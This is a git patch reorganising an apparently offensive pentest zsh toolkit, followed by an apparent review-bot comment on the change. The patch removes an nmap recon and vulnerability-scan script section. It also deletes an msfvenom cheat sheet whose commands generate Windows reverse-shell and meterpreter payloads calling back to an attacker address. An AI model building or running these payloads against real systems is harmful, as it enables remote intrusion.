From e6f25d16fe5469f36891a9b5790a47623945c2a0 Mon Sep 17 00:00:00 2001
From: 51x
Date: Fri, 13 Jan 2017 22:48:07 +0100
Subject: [PATCH] reconsidering structure
---
 chaosdir/halp/note_example.txt | 11 ----
 .../.zsh/pentest_agro_standalone.zsh | 0
 .../.zsh/pentest_chaosfile_only_EXAMPLES.zsh | 52 +------------------
 3 files changed, 1 insertion(+), 62 deletions(-)
 delete mode 100755 chaosdir/halp/note_example.txt
 rename chaosdir/agro.zsh => profile_files/.zsh/pentest_agro_standalone.zsh (100%)
 rename chaosdir/chaosfunction.zsh => profile_files/.zsh/pentest_chaosfile_only_EXAMPLES.zsh (72%)
diff --git a/chaosdir/halp/note_example.txt b/chaosdir/halp/note_example.txt
deleted file mode 100755
index 79060ba..0000000
--- a/chaosdir/halp/note_example.txt
+++ /dev/null
@@ -1,11 +0,0 @@
-C0nn3ctz shell meterpreter windows
-
-c00nt3nt
-
-Windows msfvenom cheat sheet
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe
-msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf
-msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED
-msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll
-msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll
-msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport
diff --git a/chaosdir/agro.zsh b/profile_files/.zsh/pentest_agro_standalone.zsh
similarity index 100%
rename from chaosdir/agro.zsh
rename to profile_files/.zsh/pentest_agro_standalone.zsh
diff --git a/chaosdir/chaosfunction.zsh b/profile_files/.zsh/pentest_chaosfile_only_EXAMPLES.zsh
similarity index 72%
rename from chaosdir/chaosfunction.zsh
rename to profile_files/.zsh/pentest_chaosfile_only_EXAMPLES.zsh
index e58a1b6..a32a398 100755
--- a/chaosdir/chaosfunction.zsh
+++ b/profile_files/.zsh/pentest_chaosfile_only_EXAMPLES.zsh
@@ -1,51 +1,5 @@
 #!/bin/zsh
-# Agro scanner standalone
-# License: GNU GPL v3, see LICENSE file
-# Creation date: 2017.01.10. 21:30
-# Dependencies: apt update && apt install zsh nmap python2.7 libxml2-utils -y
-# Dependencies for offensive part: apt install theharvester nmap fierce dnsrecon dnsutils hydra dirb sqlmap wget dirb curl nikto libxml2-utils whatweb
-# Requires root, sry.
-
-# Variables
-targetx=(127.0.0.1) # Space delimited!
-ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211)
-
-# Initialize directory and naming structure
-cdate=$(date +"%Y-%m-%d")
-mkdir -p result-$cdate
-cd result-$cdate
-touch scan_history.txt
-echo "---- Starting AgroScanner ----" >> scan_history.txt
-
-# Start with standard alive scan and check ports on alive hosts
-
-# Get alive hosts
-echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt
-nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out
-alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ')
-echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt
-
-# Port scanning on alive hosts and version detection
-echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." >> scan_history.txt
-nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out
-python ../agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out
-number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this.
-echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. 
Number of open ports: " $number_open_tcp_ports >> scan_history.txt
-
-# Run UDP scan on most common ports
-echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt
-nmap -sU --top-ports 50 $targetx > 4_udpscan.out
-number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l)
-echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt
-
-# Vulnerability scanning
-echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt
-nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt
-#nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something
-nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt
-echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt
-
-
+# This file contains ideas/notes/examples to be added to the main pentest zsh file.
 # Offensive part
 echo "Usage $0 domain.com [tor] [user wordlist] [password wordlist] [nessusURL:port] [nessususer] [nessuspassword]"
@@ -57,10 +11,6 @@ echo "Usage $0 domain.com [tor] [user wordlist] [password wordlist] [nessusURL:p
 echo "[DEBUG] number of arguments $#"
-# torify everything on demand
-if [ $2 == "tor" ]; then echo "TOR mode ON" && torrequested=true; fi
-
-
 # VARIABLES
 currentdir=$(pwd)
 # hydra protocol not bruted by nmap
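Review bot: The single added line (`+# This file contains ideas/notes/examples to be added to the main pentest zsh file.`) replaces the license, dependency and root-requirement comments with nothing, so a reader of the renamed examples file no longer knows which tools the remaining commands rely on; keep at least `# License: GNU GPL v3, see LICENSE file` and `# Dependencies for offensive part: apt install theharvester nmap fierce dnsrecon dnsutils hydra dirb sqlmap wget curl nikto libxml2-utils whatweb` under the new comment. The file also keeps its `#!/bin/zsh` shebang and `100755` mode while now living under `profile_files/.zsh/`; if that directory is sourced at shell startup, the top-level `echo "Usage $0 ..."` and every command below it would run on each login, which is presumably not intended for a notes file and deserves a sentence in the header. The usage line on the new side documents `[nessususer] [nessuspassword]` as positional arguments, which exposes the credential through `ps` and shell history; worth recording in the header as something to move to a prompt or an environment variable when these examples are folded into the main file. The second hunk (`@@ -57,10 +11,6 @@`) removes the only assignment of `torrequested`, so any later test of that variable outside this view now sees it unset; a `torrequested=false` default under `# VARIABLES` would keep that path well-defined. The script continues past the end of both hunks.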